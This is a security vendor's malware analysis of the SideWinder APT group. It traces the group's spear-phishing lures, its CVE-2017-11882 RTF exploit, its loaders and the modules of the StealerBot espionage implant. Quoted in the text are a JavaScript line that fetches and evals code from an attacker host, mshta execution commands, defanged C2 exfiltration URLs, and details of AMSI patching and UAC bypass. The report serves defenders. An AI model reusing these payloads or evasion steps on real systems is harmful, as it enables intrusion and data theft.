Beyond the Surface: the evolution and expansion of the SideWinder APT group
SideWinder, aka T-APT-04 or RattleSnake, is one of the most prolific APT groups that began its activities in 2012 and was first publicly mentioned by us in 2018. Over the years, the group has launched attacks against high-profile entities in South and Southeast Asia. Its primary targets have been military and government entities in Pakistan, Sri Lanka, China and Nepal.
Over the years, SideWinder has carried out an impressive number of attacks and its activities have been extensively described in various analyses and reports published by different researchers and vendors (for example, here, here and here), the latest of which was released at the end of July 2024. The group may be perceived as a low-skilled actor due to the use of public exploits, malicious LNK files and scripts as infection vectors, and the use of public RATs, but their true capabilities only become apparent when you carefully examine the details of their operations.
Despite years of observation and study, knowledge of their post-compromise activities remains limited.
During our investigation, we observed new waves of attacks that showed a significant expansion of the group’s activities. The attacks began to impact high-profile entities and strategic infrastructures in the Middle East and Africa, and we also discovered a previously unknown post-exploitation toolkit called “StealerBot”, an advanced modular implant designed specifically for espionage activities that we currently believe is the main post-exploitation tool used by SideWinder on targets of interest.
SideWinder’s most recent campaign schema
Infection vectors
The SideWinder attack chain typically starts with a spear-phishing email with an attachment, usually a Microsoft OOXML document (DOCX or XLSX) or a ZIP archive, which in turn contains a malicious LNK file. The document or LNK file starts a multi-stage infection chain with various JavaScript and .NET downloaders, which ends with the installation of the StealerBot espionage tool.
The documents often contain information obtained from public websites, which is used to lure the victim into opening the file and believing it to be legitimate. For example, the file in the image contains data downloaded from the following URL: nasc.org.np/news/closing-cerem…
Snippet of the file 71F11A359243F382779E209687496EE2, “Nepal Oil Corporation (NOC).docx”
The contents of the file are selected specifically for the target and changed depending on the target’s country.
All the documents use the remote template injection technique to download an RTF file that is stored on a remote server controlled by the attacker.
RTF exploit
RTF files were specifically crafted by the attacker to exploit CVE-2017-11882, a memory corruption vulnerability in Microsoft Office software.
The attacker embedded shellcode designed to execute JavaScript code using the “RunHTMLApplication” function available in the “mshtml.dll” Windows library.
The shellcode uses different tricks to avoid sandboxes and complicate analysis.
- It uses GlobalMemoryStatusEx to determine the size of RAM memory. If the size is less than 2GB, it terminates execution.
- It uses the CPUID instruction to obtain information about the processor manufacturer. If the CPU is not from Intel or AMD, it terminates execution.
- It attempts to load the “dotnetlogger32.dll” library. If the file is present on the system, it terminates execution.
The malware uses different strings to load libraries and functions required for execution. These strings are truncated and the missing part is added at runtime by patching the bytes. The strings are also mixed inside the code, which is adapted to skip them and jump to valid instructions during execution, to make analysis more difficult.
The strings are passed as arguments to a function that performs the same action as “GetProcAddress”: it gets the address of an exported function. To do this, it receives two arguments: a base address of a library that exports the function, and the name of the exported function.
The first argument is passed with the standard push instruction, which loads the library address to the stack. The second argument is passed indirectly using a CALL instruction.
The loaded functions are then used to perform the following actions:
- Load the “mshtml.dll” library and get the pointer to the “RunHTMLApplication” function.
- Get a pointer to the current command line using the “GetCommandLineW” function.
- Decrypt a script written in JavaScript that is embedded in the shellcode and encoded with XOR using “0x12” as the key.
- Overwrite the current process command line with the decoded JavaScript.
- Call the “RunHTMLApplication” function, which will execute the code specified in the process command line.
The loaded JavaScript downloads and executes additional script code from a remote website.
javascript:eval("v=ActiveXObject;x=new v(\"WinHttp.WinHttpRequest.5.1\");x.open(\"GET\",
\"hxxps://mofa-gov-
sa.direct888[.]net/015094_consulategz\",false);x.Send();eval(x.ResponseText);window.close()")
Initial infection LNK
During the investigation we also observed another infection vector delivered via a spear-phishing email with a ZIP file attached. The ZIP archive is distributed with names intended to trick the victim into opening the file. The attacker frequently uses names that refer to important events such as the Hajj, the annual Islamic pilgrimage to Mecca.
The archive usually contains an LNK file with the same name as the archive. For example:
ZIP filename | LNK filename |
moavineen-e-hujjaj hajj-2024.zip | MOAVINEEN-E-HUJJAJ HAJJ-2024.docx.lnk |
NIMA Invitation.zip | NIMA Invitation.doc.lnk |
Special Envoy Speech at NCA.zip | Special Envoy Speech at NCA.jpg .lnk |
දින සංශෝධන කර ගැනිම.zip (Amending dates) | දින සංශෝධන කර ගැනිම .lnk |
offer letter.zip | offer letter.docx.lnk |
The LNK file points to the “mshta.exe” utility, which is used to execute JavaScript code hosted on a malicious website controlled by the attacker.
Below are the configuration values extracted from one of these LNK files:
Local Base Path : C:\Windows\System32\sshtw.png
Description : MOAVINEEN-E-HUJJAJ HAJJ-2024.docx
Relative Path : ..\..\..\Windows\System32\calca.exe
Link Target: C:\Windows\System32\mshta.exe
Working Directory : C:\Windows\System32
Command Line Arguments : "hxxps://mora.healththebest[.]com/8eee4f/mora/hta?q=0"
Icon File Name : %systemroot%\System32\moricons.dll
Machine ID : desktop-84bs21b
Downloader module
The RTF exploits and LNK files execute the same JavaScript malware. This script decodes an embedded payload that is stored as a base64-encoded string. The payload is a .NET library named “App.dll”, which is then invoked by the script.
JavaScript loader (beautified)
App.dll is a simple downloader or dropper configured to retrieve another .NET payload from a remote URL passed as an argument by the JavaScript, or to decode and execute another payload passed as an argument.
The library should be executed by invoking the “Programs.Work()” method, which can receive three arguments as input. We named the inputs as follows:
Argument | Argument description |
C2_URL | An optional argument that can be used to pass a URL used to download a remote payload. |
Payload_filename | An optional argument that can be used together with the “Payload_Data” argument to create a file on the local filesystem that will contain the dropped payload. |
Payload_data | An optional argument that can be used to pass an encoded payload that should be dropped on the local filesystem. |
App.dll starts by collecting information about installed endpoint security products. In particular, Avast and AVG solutions are of interest to the malware. The collected data are sent to the C2. Then, if the “Payload_data” argument is not “Null”, it decodes and decompresses the data using base64 and Gzip. The resulting payload is stored in the user’s Temp directory using the filename specified in the “Payload_filename” argument.
If Avast or AVG solutions are installed, the content of the dropped file is executed with the following command:
mshta.exe "javascript:WshShell = new
ActiveXObject("WScript.Shell");WshShell.Run("%TEMP%\%Payload_filename%", 1,
false);window.close()
Otherwise, it will be executed with the following command:
pcalua.exe -a %TEMP%\%Payload_filename%
If the attacker provides a C2_URL, the malware attempts to download another payload from the specified remote URL. The obtained data is decoded with an XOR algorithm using the first 32 bytes of the received payload as the key.
The resulting file should be .NET malware named “ModuleInstaller.dll”.
ModuleInstaller
The ModuleInstaller malware is a downloader used to deploy the Trojan used to maintain a foothold on compromised machines, a malicious component we dubbed “Backdoor loader module”. We have been observing this specific component since 2020, but previously we only described it in our private intelligence reports.
ModuleInstaller was designed to drop at least four files: a legitimate and signed application used to sideload a malicious library, a .config manifest embedded in the program as a resource and required by the next stage to properly load additional modules, a malicious library, and an encrypted payload. We observed various combinations of the dropped files, the most common being:
%Malware Directory%\vssvc.exe
%Malware Directory%\%encryptedfile%
%Malware Directory%\vsstrace.dll
%Malware Directory%\vssvc.exe.config
or
%Malware Directory%\WorkFolders.exe
%Malware Directory%\%encryptedfile%
%Malware Directory%\propsys.dll
%Malware Directory%\WorkFolders.exe.config
ModuleInstaller embeds the following resources:
Resource name | MD5 | Description |
Interop_TaskScheduler_x64 | 95a49406abce52a25f0761f92166c18a | Interop.TaskScheduler.dll for 64-bit systems used to create Windows Scheduled Tasks |
Interop_TaskScheduler_x86 | dfe750747517747afa2cee76f2a0f8e4 | Interop.TaskScheduler.dll for 32-bit systems used to create Windows Scheduled Tasks |
manifest | d3136d7151f60ec41a370f4743c2983b | XML manifest dropped as .config file |
PeLauncher | 22e3a5970ae84c5f68b98f3b19dd980b | .NET program not used in the code |
shellcode | 32fc462f80b44013caeada725db5a2d1 | Shellcode used to load libraries, which exports a function named “Start” |
StealerBot_CppInstaller | a107f27e7e9bac7c38e7778d661b78ac | C++ library used to download two malicious libraries and create persistence points |
The downloader is configured to receive a URL as input and parse it to extract a specific value from a variable. The retrieved value is then compared with a list of string values that appear to be substrings of well-known endpoint security solutions:
Pattern | Endpoint Security Solution |
q=apn | Unknown |
aspers | Kaspersky |
Afree | McAfee (misspelled) |
avast | Avast |
avg | AVG |
orton | Norton |
360 | 360 Total Security |
avir | Avira |
ModuleInstaller supports six infection routines, which differ in the techniques used to execute “Backdoor loader module” or download the components, but share similarities in the main logic. Some of these routines also include tricks to remove evidence, while others don’t. The malware only runs one specific routine chosen according to the value received as an argument and the value of an internal configuration embedded in the code.
Routine | Conditions |
Infection Routine 1 | Executed when substring “q=apn” is detected. |
Infection Routine 2 | Executed when a specific byte of the internal config is equal to “1”. |
Infection Routine 3 | Executed when the substring “360” is detected. |
Infection Routine 4 | Executed when the substring “avast” or “avir” is detected. |
Infection Routine 5 | Executed when the substring “aspers” or “Afree” is detected |
Infection Routine 6 | Default case. Executed when all the other conditions are not satisfied. |
All the routines collect information about the compromised system. Specifically, they collect:
- Current username;
- Processor names and number of cores;
- Physical disk name and size;
- The values of the TotalVirtualMemorySize and TotalVisibleMemorySize properties;
- Current hostname;
- Local IP address;
- Installed OS;
- Architecture.
The collected data are then encoded in base64 and concatenated with a C2 URL embedded in the code, inside a variable named “data”.
hxxps://dynamic.nactagovpk[.]org/735e3a_download?data=<stoleninfo>
The malware has several C2 URLs embedded in the code, all of them encoded with base64 using a custom alphabet:
C2_URL_1 = hxxps://dynamic.nactagovpk[.]org/735e3a_download
C2_URL_2 = hxxps://dynamic.nactagovpk[.]org/0df7b2_download
C2_URL_3 = hxxps://dynamic.nactagovpk[.]org/27419a_download
C2_URL_4 = hxxps://dynamic.nactagovpk[.]org/ef1c4f_download
The malware sends the collected information to one of the C2 servers selected according to the specific infection routine. The server response should be a payload with various configuration values.
The set of values may vary depending on the infection routine. The malware parses the received values and assigns them to local variables. In most cases the variable names cannot be obtained from the malware code. However, in one particular infection routine the attacker used debug strings that allowed us to obtain most of these names. The table below contains the full list of possible configuration values.
Variable name | Description |
MALWARE_DIRECTORY | Directory path where all the malicious files are stored. |
LOAD_DLL_URL_X64 | URL used to download the malicious library for 64-bit systems. |
LOAD_DLL_URL_X86 | URL used to download the malicious library for 32-bit systems. |
LOAD_DLL_URL | URL used to download the malicious library. Some infection routines do not check the architecture. |
APP_DLL_URL | URL used to download the encrypted payload. |
HIJACK_EXE_URL | URL used to download the legitimate application used to sideload the malicious library. |
RUN_KEY | Name of the Windows Registry value that will be created to maintain persistence. |
HIJACK_EXE_NAME | Name of the legitimate application. |
LOAD_DLL_NAME | Name of the malicious library. |
MOD_LOAD_DLL_URL | URL used to download an unknown library that is saved in the MALWARE_DIRECTORY as “IPHelper.dll”. |
The payload is XORed twice. The keys are the first 32 bytes at the beginning of the payload.
During execution, the malware logs the current infection status by sending GET requests to the C2. The analyzed sample used C2_URL_4 for this purpose. The request includes at least one variable named “data”, whose value indicates the infection status.
Variable | Description |
?data=1 | Downloads completed. |
?data=2 | Persistence point created. |
?data=3&m=str | Error. It also contains a variable “m” with information about the error. |
?data=4 | Infection completed, but the next stage is not running. |
?data=5 | Infection completed and the next stage is running. |
The technique used to maintain persistence varies according to the infection routine selected by the malware, but generally relies on the creation of new registry values under the HKCU Run key or the creation of Windows Scheduled Tasks.
For example:
RegKey: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
RegValue: xcschemer (MALWARE_DIRECTORY)
RegValueData: %AppData%\xcschemer\vssvc.exe (HIJACK_EXE_PATH)
Backdoor loader module
The infection scheme described in the previous paragraph results in the installation of a malicious library that is sideloaded using the legitimate and digitally signed application. The library acts as a loader that retrieves an encrypted payload dropped by ModuleInstaller, decrypts it and loads it in memory.
The Backdoor loader module has been observed since 2020, we covered it in our private APT reports. It has remained almost the same over the years. It was recently updated by the attacker, but the main difference is that old variants are configured to load the encrypted file using a specific filename embedded in the program, and the latest variants were designed to enumerate all the files in the current directory and load those without an extension.
The library is usually highly obfuscated using the Control Flow Flattening technique. In addition, the strings, method names, and resource names are randomly modified with long strings, which makes the decoded code difficult to analyze. Moreover, some relevant strings are stored inside a resource embedded in the program and encrypted with an XOR layer and Triple DES.
The malware also contains anti-sandbox techniques. It takes the current date and time and puts the thread to sleep for 100 seconds. Sandboxes usually ignore the sleeping functions because they are often used by malware to generate long delays in execution and avoid detection. Upon awakening, the malware retrieves again the current time and date and checks if the elapsed time is less than 90.5 seconds. If the condition is true, it terminates the execution.
The malware also attempts to avoid detection by patching the AmsiScanBuffer function in “amsi.dll” (Windows Antimalware Scan Interface). Specifically, it loads the “amsi.dll” library and parses the export directory to find the “AmsiScanBuffer” function. In this function, it changes the memory protection flags to modify instructions at RVA 0x337D to always return error code 0x80070057 (E_INVALIDARG – Invalid Argument). This change forces the “Amsi” protection to always return a scan result equal to 0, which is usually interpreted as AMSI_RESULT_CLEAN.
AmsiScanBuffer before patching
The patched code is only one byte in size: the malware changes 0x74, which corresponds to the JZ (Jump if zero) instruction, to 0x75, which corresponds to JNZ (Jump if not zero). The jump should be made when the buffer provided as input to the AmsiScanBuffer function is invalid. With the modification, the jump will be made for all valid buffers.
After patching AmsiScanBuffer, the malware performs a startup operation to achieve its main goal, which is to load another payload from the encrypted file. First, it enumerates files in the current directory and tries to find a file without the character ‘.’ in the file name (i.e., without an extension). Then, if the file is found, it uses the first 16 bytes at the beginning of the file as the key and decodes the rest of the data using the XOR algorithm. Finally, it loads the data as a .NET assembly and invokes the “Program.ctor” method.
StealerBot
StealerBot is a name assigned by the attacker to a modular implant developed with .NET to perform espionage activities. We never observed any of the implant components on the filesystem. They are loaded into memory by the Backdoor loader module. Prior to being loaded, the binary is stored in an encrypted file.
The implant consists of different modules loaded by the main “Orchestrator”, which is responsible for communicating with the C2 and executing and managing the plugins. During the investigation, we discovered several plugins that were uploaded on compromised victims and were used to:
- Install additional malware;
- Capture screenshots;
- Log keystrokes;
- Steal passwords from browsers;
- Intercept RDP credentials;
- Steal files;
- Start reverse shell;
- Phish Windows credentials;
- Escalate privileges bypassing UAC.
Module IDs are included both in modules and in an encrypted configuration file. The Orchestrator uses them to manage the components. It shares messages/commands with the modules, and can handle specific messages to kill or remove modules with a particular ID.
Module ID | Description |
0xca | Keylogger |
0xcb | Live Console |
0xd0 | Screenshot Grabber |
0xd4 | File Stealer |
0xd6 | UACBypass |
0xe0 | RDP Credential Stealer |
0xe1 | Token Grabber |
?? | Credential Phisher |
StealerBot Orchestrator
The Orchestrator is usually loaded by the Backdoor loader module and is responsible for communicating with the C2 server, and executing and managing plugins. It periodically connects to two URLs to download modules provided by the attacker and upload files with stolen information. It also exchanges messages with the loaded module that can be used to provide or modify configuration properties and unload specific components from the memory.
Once loaded into memory, the malware decodes a resource embedded in the Orchestrator called “Default”. The resource contains a configuration file with the following structure:
Parameter | Parameter type | Description |
Config path | String | Location used to store the configuration file after first execution |
Data directory | String | Directory where the plugins store the output files that will be uploaded to the remote C2 |
C2 Modules | String | URL used to communicate with C2 server and retrieve additional plugins |
C2 Gateway | String | URL used to upload files generated by modules |
C2 Modules Sleeptime | Integer | Sleep time between communications with “C2 Modules” |
C2 Gateway Sleeptime | Integer | Sleep time between communications with “C2 Gateway” |
RSA_Key | String | RSA key used to encrypt communication with the C2 server |
Number of plugins | Integer | Number of plugins embedded in the configuration |
Modules | Array | Array which contains the modules |
The configuration can embed multiple modules. By default, the array is usually empty, but after initial execution, the malware creates a copy of the configuration in a local file and keeps it updated with information retrieved from the C2 server.
After parsing the configuration, the malware loads all the modules specified in the file. It then launches two threads to communicate with the remote C2 server. The first thread is used to communicate with the first URL that we dubbed “C2 Modules”, which is used to obtain new modules. The second thread is used to communicate with the URL we called “C2 Gateway”, which is used to upload the data generated by the modules.
The malware communicates with the C2 Modules server using GET requests. Before sending the request, it adds an “x” value that contains the list of modules already loaded by the agent.
&x[moduleId_1,moduleId_2,moduleId_3,etc.]"
The server responds with a message composed of two parts, the header and the payload. Each part has a specific structure with different information:
Each message is digitally signed with the RSA private key owned by the server-side attacker, and the signature is stored in the “rgbSignature” value. The Orchestrator uses the “RSACryptoServiceProvider.VerifyHash” method to verify that the provided digital signature is valid.
The header is encoded with the same XOR algorithm used to encode or decode the configuration file. The payload is compressed using Gzip and encrypted using AES. The header contains the information needed to identify the module, decrypt the payload, and verify the received data.
When the module is loaded, the Orchestrator invokes the module main method, passing two arguments: the module ID and a pipe handle. The pipe is used to maintain communication between the module and the Orchestrator.
The modules can send various messages to the Orchestrator to get or modify the configuration, send log messages, and terminate module execution. The messages function like commands, have a specific ID, and can include arguments.
The first byte of the message is its ID, which defines the request type:
Message ID | Description |
0 | Get settings: the Orchestrator creates a copy of the current configuration and sends it to the module. |
1 | Update config: the module provides a new configuration and the Orchestrator updates the current configuration values and stores them in the local file. |
2 | Unload current module: the Orchestrator should unload the current module from the memory and close the related pipes. |
3 | Unload module by ID: the Orchestrator should unload a module with the ID specified in the received request. |
4 | Remove startup: the Orchestrator should remove a module from the local configuration. The module ID is specified in the received request. |
5 | Remove current module from the configuration: the Orchestrator should remove the current module ID from the local configuration. |
6 | Terminate current thread: the Orchestrator stops timers, pipes and removes the current module from the current list of modules. |
7 | Save log message: the Orchestrator saves a log message using the current module ID. |
8 | Save log message: the Orchestrator saves a log message using the specified module ID. |
9 | Get output folder configuration. |
10 | Get C2 Modules URL: the Orchestrator shares the current C2 Modules URL with the module. |
11 | Get C2 Gateway URL: the Orchestrator shares the current C2 Gateway URL with the module. |
12 | Get RSA_Key public key. |
Modules
Keylogger
This module uses the “SetWindowsHookEx” function specified in the “user32.dll” library to install a hook procedure and monitor low-level keyboard and mouse input events. The malware can log keystrokes, mouse events, Windows clipboard contents, and the title of the currently active window.
Screenshot Grabber
This module periodically grabs screenshots of the primary screen.
File Stealer
The File Stealer module collects files from specific directories. It also scans removable drives to steal files with specific extensions. By default, the list of extensions is as follows:
.ppk,.doc,.docx,.xls,.xlsx,.ppt,.zip,.pdf
Based on these values, we can conclude that this tool was developed to perform espionage activities by collecting files that usually contain sensitive information, such as Microsoft Office documents. It also searches for PPK files, which is the extension of files created by PuTTY to store private keys. PuTTY is an SSH and Telnet client commonly used on Windows OS to access remote systems.
The stolen data also includes information about the local drive and file attributes.
Snippet of code with the list of information collected by the File Stealer module
Live Console
This library is configured to execute arbitrary commands on the compromised system. It can be used as a passive backdoor, listening to the loopback interface, or as a reverse shell, connecting to the C2 to receive commands. The library can also process custom commands that provide the following capabilities:
- Kill the module itself or its child processes;
- Download additional files to compromised systems;
- Add Windows Defender exclusions;
- Infect other users on the local system (requires high privileges);
- Download and execute remote HTML applications;
- Load arbitrary modules and extend malware capabilities.
Unlike the other modules, Live Console communicates directly with a C2 whose address is embedded in the module’s code. By default, the malware starts a new “cmd.exe” process, forwards data received from the attacker to its standard input, and forwards the process output or error pipeline to the attacker.
If the infected OS is recent, i.e., Windows 10 build version greater than or equal to “17763”, the malware creates a pseudoconsole to launch “cmd.exe”. Otherwise, it launches the same application using the “Process” class specified in “System.Diagnostics”.
Before forwarding the command to the console, the malware checks if the first byte of the received data has a specific value that indicates the presence of a custom command. Below is a list of these values (command IDs) with descriptions of the commands they identify.
Windows build | Command ID | Description |
< 17763 | 3 | Kill all child processes |
< 17763 | 4 | Kill the current module. Sends the message ID “2” to the Orchestrator to unload the module itself. |
< 17763 | 16 | Upload file to the infected system |
>= 17763 | 1 | Infect current logged-in user |
>= 17763 | 2 | Get current logged-in user |
>= 17763 | 3 | Download and execute a remote HTML application |
>= 17763 | 4 | Add directories to AV exclusions |
>= 17763 | 5 | Load a plugin |
Most of the commands are self-explanatory. We’d like to add a few words on the command with ID “1”, which is used to infect other users on the same system whose profile is still “clean”. The malware infects the user by creating a copy of the samples in the target user’s directory and creates a new registry value to ensure persistence.
This command is interesting because in the case of a specific error, the bot replies with the following message:
Infected User is already logged in, use install dynx command from stealer bot
for installation
Currently, we don’t know what the dynx command represents, but the name “stealer bot” in this message and the name of the resource embedded in the “ModuleInstaller”, “StealerBot_CppInstaller”, led us to conclude that the attacker named this malware StealerBot.
RDP Credential Stealer
This module consists of different components: a .NET library, shellcode, and a C++ library. It monitors running processes and injects malicious code into “mstsc.exe” to steal RDP credentials.
Mstsc.exe is the “Microsoft Terminal Service Client” process, which is the default RDP client on Windows. The malware monitors the creation or termination of processes with the name “mstsc.exe”. When a new creation event is detected the malware creates a new pipe with the static name “c63hh148d7c9437caa0f5850256ad32c” and injects malicious code into the new process memory.
The injected code consists of different payloads that are embedded in the module as resources. The payloads are selected at runtime according to the system architecture, and merged before injection. The injected code is a shellcode that loads another malicious library called “mscorlib”, written in C++ to steal RDP credentials by hooking specific functions of the Windows library “SspiCli.dll”. The library code appears to be based on open-source projects available on GitHub. It uses the Microsoft Detours Package to add or remove the hooks to the following functions:
- SspiPrepareForCredRead;
- CryptProtectMemory;
- CredIsMarshaledCredentialW.
The three functions are hooked to obtain the server name, password, and username, respectively. The stolen data are sent to the main module using the previously created pipe named “c63hh148d7c9437caa0f5850256ad32c”.
Token Grabber
The module is a .NET library designed to steal Google Chrome browser cookies and authentication tokens related to Facebook, LinkedIn and Google services (Gmail, Google Drive, etc.). It has many code dependencies and starts by loading additional legitimate and signed libraries whose functions it uses. These libraries are not present on the compromised system by default, so the malware has to drop and load them to function properly.
Library | Hash | Description |
Newtonsoft.Json | 52a7a3100310400e4655fb6cf204f024 | A popular high-performance JSON framework for .NET |
System.Data.SQLite | fcb2bc2caf7456cd9c2ffab633c1aa0b | An ADO.NET provider for SQLite |
SQLite_Interop_x64.dll | 1b0114d4720af20f225e2fbd653cd296 | A library for 64-bit architectures required by System.Data.SQLite to work properly |
SQLite_Interop_x86.dll | f72f57aa894f7efbef7574a9e853406d | A library for 32-bit architectures required by System.Data.SQLite to work properly |
Credential Phisher
This module attempts to harvest the user’s Windows credentials by displaying a phishing prompt designed to deceive the victim.
Similar to the RDP Credential Stealer, the malware creates a new pipe (“a21hg56ue2c2365cba1g9840256ad31c”) and injects malicious shellcode into a targeted process, in this case “explorer.exe”. The shellcode loads a malicious library called “credsphisher.dll”, which uses the Windows function “CredUIPromptForWindowsCredentialsW” to display a phishing prompt to current users and trick victims into entering their Windows credentials.
When the user enters the credentials, the malware uses the “LogonUserW” function to check that the username and password provided are correct. If the user enters incorrect credentials, the malware continues to display the prompt until it receives a valid password. Finally, upon successful credential validation, the malware writes the computer hostname, username and password to a previously created pipe named “a21hg56ue2c2365cba1g9840256ad31c”.
UACBypass
This module is a .NET library designed to bypass UAC and run malicious code with high privileges.
The library can achieve its goal using different bypass techniques, selected according to the Windows version and the security solution installed on the infected machine. The malware embeds various resources containing different payloads used during malware execution.
Library | Hash | Description |
COMUacBypass | 7f357621ba88a2a52b8146492364b6e0 | Library used to bypass UAC abusing IElevatedFactoryServer COM object |
manifest | d3136d7151f60ec41a370f4743c2983b | XML manifest |
Module | b0f0c29f4143605d5f958eba664cc295 | Malicious library used to download additional malware |
ReflectiveDllLoader | f492b2d5431985078b85c78661e20c09 | Shellcode to run libraries in memory |
VmComputeAgent | ba2914b59c7ae08c346fc5a984dcc219 | Program used for Slui UAC bypass technique |
VmComputeAgent_exe | d3136d7151f60ec41a370f4743c2983b | XML manifest |
Before starting its execution, the malware checks certain conditions on the system, namely that UAC elevation doesn’t require admin credentials and that the infected user belongs to the ‘Administrator’ group. If both conditions are met, the malware checks the Windows version and drops some artifacts according to the obtained values.
Windows Server or Windows NT 6 | |
%Temp%\%TempFile% | Copy of resource named “Module” |
%localappdata%\Microsoft\rundll32.exe | Copy of the legitimate program “%systemroot%\System32\rundll32.exe” |
%localappdata%\Microsoft\rundll32.exe.config | Copy of resource named “manifest” |
Other Windows versions | |
%localappdata%\Microsoft\devobj.dll | Copy of resource named “Module” |
%localappdata%\Microsoft\rdpclip.exe | Copy of the legitimate program “%systemroot%\System32\rdpclip.exe” |
The main goal of this component is to execute the resource named “Module”, which is a downloader, with high privileges. The malware tries to use different UAC bypass techniques, which are selected according to the installed security solution. By default, it tries to abuse the CMSTP (Windows Connection Manager Profile Installer) program. This legitimate program is abused with a technique discovered in 2017, where the attacker can pass a custom profile to execute arbitrary commands with high privilege. The default bypass technique is used on all systems except those protected by Kaspersky or 360 Total Security.
If these security solutions are detected, the malware attempts to use a more recent UAC bypass technique discovered in 2022, which abuses the “IElevatedFactoryServer” COM object.
In this case, the malware injects malicious shellcode into “explorer.exe”. The shellcode loads and executes a malicious library that was stored in the resource named “COMUacBypass”. The library uses the “IElevatedFactoryServer” COM object to register a new Windows task with the highest privileges, allowing the attacker to execute the command to run the dropped payload with elevated privileges.
During the static analysis of the “UACBypass” module we noticed the presence of code that is not called or executed. Specifically, we noticed a method named “KasperskyUACBypass” that implements another bypass technique that was probably used in the past when the system was protected by Kaspersky anti-malware software. The method implements a bypass technique that abuses the legitimate Windows program slui.exe. It is used to activate and register the operating system with a valid product key, but is prone to a file handler hijacking weakness. The hijacking technique was described in 2020 and is based on the modification of specific Windows registry keys. Based on the created values, we believe the attacker based their code on a proof of concept available on GitHub.
The module still includes two resources that are used exclusively by this code:
VmComputeAgent
VmComputeAgent_exe
The first is a very simple program, packed with ConfuserEx, which starts a new process: “%systemroot%\System32\slui.exe” as administrator.
The second is an XML manifest.
Downloader
The library is a downloader developed in C++ that attempts to retrieve three payloads using different URLs.
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/bf7dy/111e9a21?name=inpl64
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/0ywcg/4dfc92c?name=stg64
hxxps://nventic[.]info/mod/rnd/214/632/56/w3vfa3BaoAyKPfNnshLHQvQHCaPmqNpNVnZMLxXY/1/1712588158138/3ysvj/955da0ae?name=rflr
Unfortunately, we were not able to get a valid response from the server, but considering the “name” variable inside the URL and the logic of the various components observed during the investigation, we can infer that each “name” value probably also indicates the real purpose of the file.
Variable | Description |
?name=inpl64 | implant for 64-bit architectures |
?name=stg64 | stager for 64-bit architectures |
?name=rlfr | reflective loader ??? |
The downloaded data are combined into a final payload with the following structure:
stg64 + <size of rlfr+inpl64+8> + rlfr + <delimiter> + inpl64
Finally, the malware loads the payload into memory and executes it. The execution method is selected according to the version of Windows.
On systems prior to Windows 10, the malware allocates a memory region with read, write and execution permissions, copies the previously generated payload to the new region, and directly calls the first address.
On newer systems, the malware allocates a larger memory space and prepends a small shellcode located in the “.data” section to the final payload.
The malware then patches the kernel32 image in memory and hooks the “LoadLibraryA” function to redirect the execution flow to the small shellcode copied in the allocated region.
Finally, it calls the “LoadLibraryA” function, passing the argument “aepic.dll”.
Snippet of reversed code used to hook LoadLibrary and run the payload
The small shellcode compares the first 8 bytes of the received argument with the static string “aepic.dl”, and if the bytes match, it jumps to the downloaded shellcode “stg64”; otherwise, it jumps to the real “LoadLibraryA” function.
Shellcode embedded in the downloader image
Installers
During the investigation we found two more components, which are installers used to deploy the StealerBot on the systems. We didn’t observe them during the infection chain. They are probably used to install new versions of the malware or deploy the malware in different contexts on the same machine. For example, to infect another user.
InstallerPayload
The first component is a library developed in C++ that acts as a loader. The code is very similar to the “Downloader” component observed in the UAC bypass module. The library contains different payloads that are joined together at runtime and injected into the remote “spoolsv.exe” process.
The injected payload reflectively loads a library called “InstallerPayload.dll”, written in C++, to download additional components and maintain their persistence by creating a new Windows service.
The malware is configured to download the files from a predefined URL using WinHTTP.
hxxps://pafgovt[.]com/mod/rnd/214/15109/14786/X6HPUSbM5luLGTzAhI12Ly8CfydiP869E
F0mo673/1/1706084656128/x3l8o/2c821e
The specific file to be downloaded is requested with a variable “name”, which is included in all GET requests. Each file is downloaded to a specific location:
Variable | Destination file path |
?name=bp | %systemroot%\srclinks\%RANDOM_NAME% Example name: VacPWtys |
?name=ps | %systemroot%\srclinks\write.exe or %systemroot%\srclinks\fsquirt.exe |
?name=dj | %systemroot%\srclinks\devobj.dll or %systemroot%\srclinks\propsys.dll |
?name=v3d | %systemroot%\srclinks\vm3dservice.exe |
?name=svh | %systemroot%\srclinks\winmm.dll |
?name=fsq | %systemroot%\srclinks\write.exe or %systemroot%\srclinks\fsquirt.exe |
The specific filename changes according to the Windows version.
If the Windows build is lower than 10240 (Windows 10 build 10240), the malware installs the following files:
- %systemroot%\srclinks\write.exe
- %systemroot%\srclinks\propsys.dll
- %systemroot%\srclinks\write.exe.config
- %systemroot%\srclinks\vm3dservice.exe
- %systemroot%\srclinks\winmm.dll
Otherwise:
- %systemroot%\srclinks\fsquirt.exe
- %systemroot%\srclinks\devobj.dll
- %systemroot%\srclinks\fsquirt.exe.config
- %systemroot%\srclinks\vm3dservice.exe
- %systemroot%\srclinks\winmm.dll
The malware also creates a new Windows service named
"srclink" to ensure that the downloaded files can start automatically when the system restarts.
The service is configured to start automatically and run the following program:
C:\WINDOWS\srclinks\vm3dservice.exe
The file is a legitimate program digitally signed by VMware and is used by the attacker to sideload the malicious
"winmm.dll" library.
This is a library developed in C++ and named
"SyncBotServiceHijack.dll" that exports all the functions normally exported by the legitimate “winmm.dll” library located in the system32 directory.
All the functions point to a function that sleeps for 10 seconds and then raises a signal error and terminates execution.
Instructions used to raise an error
This is part of the persistence mechanism created by the attacker. The malicious Windows service created by the InstallerPayload component is configured to launch another program if the service fails.
We may presume that the attacker uses this trick to bypass detection and sandbox technologies.
In this case, the service starts another program previously dropped by the malware:
%systemroot%\srclinks\fsquirt.exe
This is a legitimate Windows utility that provides the default GUI used by the Bluetooth File Transfer Wizard. This utility is used by the attacker to sideload another malicious library,
"devobj.dll", which is a variant of the Backdoor loader module.
InstallerPayload_NET
This is another .NET library, which performs similar actions to the previously described InstallerPayload developed in C++. The main difference is that this malware embeds most of the files as resources.
Library | Hash | Description |
devobjLoadAppDllx32 | a7aad43a572f44f8c008b9885cf936cf | “Backdoor loader module” dropped as devobj.dll |
fsquirt | ba54013cad72cd79d2b7843602835ed3 | Legitimate program signed by Microsoft |
Manage | f840c721e533c05d152d2bc7bf1bc165 | Program to hijack Windows service |
manifest | d3136d7151f60ec41a370f4743c2983b | XML manifest |
propsysLoadAppDllx32 | 56e7d6b5c61306096a5ba22ebbfb454e | “Backdoor loader module” dropped as propsys.dll |
